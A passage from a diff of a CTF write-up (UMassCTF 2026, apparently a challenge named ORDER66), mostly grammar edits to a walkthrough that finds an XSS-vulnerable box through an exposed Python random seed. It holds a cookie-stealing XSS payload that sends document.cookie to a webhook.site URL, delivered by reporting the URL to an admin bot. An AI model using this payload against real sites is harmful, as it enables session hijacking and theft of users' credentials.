emp3r0r10/emp3r0r10.github.io/_posts/CTF_Writeups/2026-04-12-UMassCTF2026_Writeup.md

     seed = session['seed']
     grid_data, vuln_index = get_grid_context(uid, seed)

     return render_template('index.html', vuln_index=vuln_index, grid_data=grid_data, user_id=uid, seed=seed, host=host)
 ```

-Python's `random` is deterministic. sme seed equals same output, every time.
-The seed is exposed in the page.
-So we can extract the vulnerable box locally:
+Python's `random` is deterministic.
+The same seed equals the same output every time, and the seed is exposed in the page.
+So we can determine the vulnerable box locally:

 ![Vulnerable_Box_Num](/assets/images/ctf_writeups/UMass_CTF/ORDER66/Vulnerable_Box_Num.png)

-If our payload is in the wrong box, the vulnerable box moves on every submission.
-If it's in the right box, the seed and therefore the vulnerable box stays fixed permanently.
-So, we can send the seed URL to admin and get the flag.
+If our payload is in the wrong box, the vulnerable box moves with every submission.
+If it's in the right box, the seed and, therefore, the vulnerable box stay fixed permanently.
+So, we can send the seed URL to the admin and get the flag.

 **Payload:** `<script>fetch('https://webhook.site/YOUR-ID?c='+document.cookie)</script>`

-Now, let's send the seed URL to admin and get the flag.
+Now, let's send the seed URL to the admin and get the flag.

 ![admin_report](/assets/images/ctf_writeups/UMass_CTF/ORDER66/admin_report.png)